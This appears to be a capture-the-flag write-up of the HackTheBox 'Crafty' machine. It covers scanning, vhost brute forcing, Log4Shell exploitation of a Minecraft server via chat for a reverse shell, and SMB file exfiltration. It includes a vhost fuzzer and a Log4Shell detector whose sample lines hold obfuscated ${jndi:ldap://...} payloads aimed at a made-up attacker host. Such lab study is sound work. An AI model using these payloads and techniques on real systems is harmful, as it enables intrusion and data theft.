Running (JUST GUESSING): Microsoft Windows 2019 (88%)
Aggressive OS guesses: Microsoft Windows Server 2019 (88%)
No exact OS matches for host (test conditions non-ideal).
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Only two ports were found: an IIS web service and a Minecraft game server, so the web service comes first. Note also that nmap reports it did not follow a redirect to a hostname; by experience, every hostname that shows up must be added to the hosts file, which is essential.

Vulnerability script scan

┌──(root㉿kali)-[/home/kali/Desktop/htb/Crafty]
└─# nmap --script=vuln -p80,25565 10.10.11.249 -oA nmapscan/tcpvuln 
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-29 23:56 EDT
Stats: 0:00:42 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 98.03% done; ETC: 23:57 (0:00:01 remaining)
Stats: 0:03:57 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 99.51% done; ETC: 00:00 (0:00:01 remaining)
Nmap scan report for crafty.htb (10.10.11.249)
Host is up (0.12s latency).

PORT      STATE SERVICE
80/tcp    open  http
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
25565/tcp open  minecraft

Nmap done: 1 IP address (1 host up) scanned in 495.65 seconds

Nothing of value.

First look at the web

Visiting the home page reveals another URL, which also needs to go into the hosts file:
[screenshot omitted]
The new host looks almost identical to the original site. Continuing through the original site's features, every link leads to http://crafty.htb/coming-soon.
Viewing the source with F12 shows nothing suspicious on a first pass.

Directory brute force

Next came directory brute forcing, with several common tools in parallel to make sure nothing was missed; dirb, gobuster and feroxbuster all found nothing of value.

DNS brute force

Since one subdomain already appeared, serving the same content as the main domain, it is reasonable to guess there are others. Brute forcing them only returned the subdomain we already knew.

Virtual-host brute force (video hint: the many small details of subdomain brute forcing)

Subdomain brute forcing found nothing, and neither did the other attempts. Watching the Red Team Notes (红队笔记) video gave the answer: the approach was incomplete. Beyond DNS subdomain brute forcing, one can also brute-force virtual hosts. When a single server hosts several sites or applications (a multi-tenant environment, for instance), other virtual hosts may be found this way, and their URLs look just like subdomains. So we switch gobuster to vhost mode. The two modes work differently, so the arguments differ slightly: the wordlist contains bare labels rather than full hostnames, so --append-domain is needed, and since the known domain redirects, -r can be added to follow redirects:

┌──(root㉿kali)-[/home/kali/Desktop/htb/Crafty]
└─# gobuster vhost -u http://10.10.11.249 --domain crafty.htb -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-110000.txt --append-domain -r

The dns mode resolves each candidate name through DNS (for example the target's DNS server on port 53); the vhost mode sends each candidate to the web server in the HTTP Host header and judges by the response (status code and size) compared with a baseline for names that do not exist. So when port 53 is closed, vhost mode can still discover names.

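To make the difference concrete, the following is an added example, not code from the write-up or from gobuster, that implements the vhost principle described above: request the same IP with each candidate in the Host header and keep the candidates whose (status, length) differs from the server's answer for random hostnames that certainly do not exist. The fetch function is injectable, so the logic runs offline against a constructed fake site (the staging vhost in it is made up, not a host on the box); http_fetcher() is the live adapter and is an assumption about how one would wire it up.

```python
"""Virtual-host discovery by Host-header fuzzing.

Added example (not from the write-up or from gobuster). It shows the
principle behind gobuster's vhost mode: request the same IP with each
candidate in the Host header and keep the candidates whose response
differs from the server's answer for hostnames that certainly do not exist.
The fetcher is injectable, so the logic runs here against a constructed
fake site; http_fetcher() is the live adapter.
"""
import random
import string
import urllib.error
import urllib.request
from typing import Callable, Iterable, List, Set, Tuple

Fingerprint = Tuple[int, int]           # (HTTP status, body length)
Fetcher = Callable[[str], Fingerprint]  # Host header value -> fingerprint


def random_label(n: int = 12) -> str:
    return "".join(random.choice(string.ascii_lowercase) for _ in range(n))


def baseline(fetch: Fetcher, domain: str, samples: int = 3) -> Set[Fingerprint]:
    """How the server answers for names that do not exist (the 'nothing here' fingerprint)."""
    return {fetch(f"{random_label()}.{domain}") for _ in range(samples)}


def fuzz_vhosts(fetch: Fetcher, domain: str, words: Iterable[str],
                append_domain: bool = True) -> List[Tuple[str, Fingerprint]]:
    """Candidates whose (status, length) differs from the baseline. append_domain mirrors
    gobuster's --append-domain: the wordlist holds bare labels, not full hostnames."""
    base = baseline(fetch, domain)
    found = []
    for word in words:
        host = f"{word}.{domain}" if append_domain else word
        fp = fetch(host)
        if fp not in base:
            found.append((host, fp))
    return found


def http_fetcher(ip: str, timeout: float = 5.0) -> Fetcher:
    """Live adapter: GET / on the IP with the candidate as Host. Redirects are
    deliberately not followed, because the 3xx itself is part of the fingerprint."""
    class NoRedirect(urllib.request.HTTPRedirectHandler):
        def redirect_request(self, req, fp, code, msg, headers, newurl):
            return None
    opener = urllib.request.build_opener(NoRedirect)

    def fetch(host: str) -> Fingerprint:
        req = urllib.request.Request(f"http://{ip}/", headers={"Host": host})
        try:
            with opener.open(req, timeout=timeout) as resp:
                return resp.status, len(resp.read())
        except urllib.error.HTTPError as err:     # 3xx/4xx/5xx still carry a fingerprint
            return err.code, len(err.read())
    return fetch


def fake_site(host: str) -> Fingerprint:
    """Constructed stand-in for the target: two real vhosts, everything else redirected.
    'staging' is a made-up name, not a host found on the box."""
    pages = {"crafty.htb": (200, 4096), "staging.crafty.htb": (200, 5120)}
    return pages.get(host, (301, 150))


if __name__ == "__main__":
    words = ["www", "staging", "dev", "mail"]
    print(fuzz_vhosts(fake_site, "crafty.htb", words))
    # live: fuzz_vhosts(http_fetcher("10.10.11.249"), "crafty.htb", words)
```

The baseline step is the part worth remembering: a server that answers every unknown name with the same redirect (as here) makes the real vhosts stand out, whereas one that varies its error page length per request needs a looser comparison (status only, or a length tolerance) to avoid false positives.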
Working faster with gobuster (video supplement)

gobuster's completion subcommand changes how the current shell interacts with gobuster and noticeably improves the experience: less memorising of commands and fewer tedious steps (such as running --help every time the next argument is forgotten). It prompts the next step fairly intelligently, which helps efficiency in real engagements; other large tools such as nmap offer something similar.
Usage:
First check which shell is in use:

┌──(root㉿kali)-[/home/kali]
└─# echo $SHELL
/usr/bin/zsh

The following command generates the completion script for that shell:
[screenshot omitted]
Append it to the user's zsh configuration file ~/.zshrc and reload it:
[screenshot omitted]
Now typing gobuster and pressing Tab shows the command's options directly instead of the shell's default file completion, and as the command grows the prompts follow step by step, offering more precise help as the command is written.

Probing an unfamiliar port (video supplement)

Take port 25565 here. Anyone familiar with Minecraft recognises it at a glance as the default port for joining a multiplayer server, but if not, try the following:

  1. Visit it in a browser
  2. Visit it with curl
  3. Connect with nc and watch the response
    [screenshot omitted]
    A decoding error appears, but some information leaks, for example that the service is written in Java.
    [screenshot omitted]
    -L follows redirects; same result. The nc connection got no response.

Exploring the Minecraft server

Switch the OpenVPN connection to a Windows host and configure its hosts file the same way. From experience, joining a Minecraft server requires the local client version (and some mods) to match the server. First connect with any version to read the server version (nmap already reported it above):
[screenshot omitted]
[screenshot omitted]
So the connection has to be made with a local 1.16.5 client.

Searching for a public PoC

Search with the following keywords:
[screenshot omitted]
[Article 1] gives a clear exploitation method.
[Article 2] explains the Log4Shell principle in detail with a small demonstration.
The principle is easy to follow: the server logs every chat message through log4j 2, so a lookup string typed into chat is evaluated server-side. Thinking of this vulnerability here, however, is not easy:
[screenshot omitted]
[screenshot omitted]

Getting a foothold

Since the target is Windows and poc.py defaults to a Linux shell, the reverse-shell command has to be changed to one that works on Windows:
[screenshot omitted]
[screenshot omitted]
[screenshot omitted]
Then, inside Minecraft, type the generated ${jndi:...} payload into the chat box, and the shell comes back.
[screenshot omitted]

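Seen from the defender's side, the chat message above is exactly what a server-log detection has to catch. The following is an added example, not code from the write-up or from either referenced article: log4j 2 expands nested lookups before evaluating the outer one, so a detector has to resolve the common obfuscations (${lower:j}, ${upper:j}, ${::-j}, ${env:NAME:-j}) before looking for ${jndi:. The chat lines are constructed and the attacker address 10.10.14.5 is made up.

```python
"""Detect Log4Shell lookup strings in chat or log lines.

Added example (not from the write-up or the articles it cites). A log4j 2
lookup is evaluated after nested lookups are expanded, so a detector has
to expand the common obfuscations before looking for '${jndi:'.
"""
import re
from typing import List, Tuple

# Innermost ${...}: a lookup whose body contains no further '$', '{' or '}'.
INNER = re.compile(r"\$\{([^${}]*)\}")
JNDI = re.compile(r"\$\{\s*jndi\s*:", re.I)


def _resolve(m: "re.Match[str]") -> str:
    body = m.group(1)
    low = body.lower()
    if low.startswith("jndi:"):          # the payload itself: leave for the final check
        return m.group(0)
    if low.startswith("lower:"):         # ${lower:J} -> j
        return body[len("lower:"):].lower()
    if low.startswith("upper:"):         # ${upper:j} -> J
        return body[len("upper:"):].upper()
    if ":-" in body:                     # ${env:NOPE:-j}, ${::-j}, ${sys:x:-j} -> default value
        return body.rsplit(":-", 1)[1]
    return m.group(0)                    # unknown lookup (e.g. ${cost}): keep literally


def normalize(text: str, max_rounds: int = 20) -> str:
    """Expand nested lookups inside-out until nothing changes (bounded to avoid loops)."""
    for _ in range(max_rounds):
        expanded = INNER.sub(_resolve, text)
        if expanded == text:
            break
        text = expanded
    return text


def is_log4shell(line: str) -> bool:
    return JNDI.search(normalize(line)) is not None


def scan(lines: List[str]) -> List[Tuple[int, str]]:
    """(1-based line number, normalised line) for every line carrying a JNDI lookup."""
    return [(i, normalize(line)) for i, line in enumerate(lines, 1) if is_log4shell(line)]


# Constructed chat log; 10.10.14.5 is a made-up attacker address.
SAMPLE_CHAT = [
    "[12:00:01] <steve> hello everyone",
    "[12:00:05] <alex> ${jndi:ldap://10.10.14.5:1389/a}",
    "[12:00:09] <alex> ${${lower:j}${lower:n}${lower:d}i:ldap://10.10.14.5:1389/a}",
    "[12:00:12] <alex> ${${::-j}ndi:rmi://10.10.14.5:1099/x}",
    "[12:00:15] <alex> ${${env:NaN:-j}ndi${env:NaN:-:}ldap://10.10.14.5/x}",
    "[12:00:20] <steve> price is ${cost} not $jndi",
]

if __name__ == "__main__":
    for n, line in scan(SAMPLE_CHAT):
        print(f"line {n}: {line}")
```

The resolver covers the lookups most often used for evasion; it does not model every log4j lookup (for example the Unicode tricks that ${upper:} can pull off with non-ASCII letters), so a production rule should be paired with the real fix of upgrading log4j or removing the JndiLookup class.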
rlwrap for a more usable reverse shell (video supplement)

[screenshot omitted]
With the shell made interactive, switch the reverse shell to powershell, where commands such as gci (Get-ChildItem) quickly gather the information wanted, for example:
[screenshot omitted]

Enumeration before privilege escalation

The current user's home directory and the C:\inetpub web root hold nothing of value; only two .jar files are worth extracting for further analysis. The target has no python, and with limited experience this was the only transfer method that came to mind; I did not know what other ways there were to pull the files out.

Transferring files from the target with impacket-smbserver (video supplement)

Even without python on the target, it is Windows, so we can stand up an SMB server with impacket's smbserver and copy the files over the share (a current Windows client expects SMB2 and credentials, which smbserver provides through its -smb2support and -username/-password options):
[screenshot omitted]
Remember to clean up afterwards by deleting the mapped connection (net use ... /delete)!
[screenshot omitted]

Reversing the jar files

Last updated 2024-10-09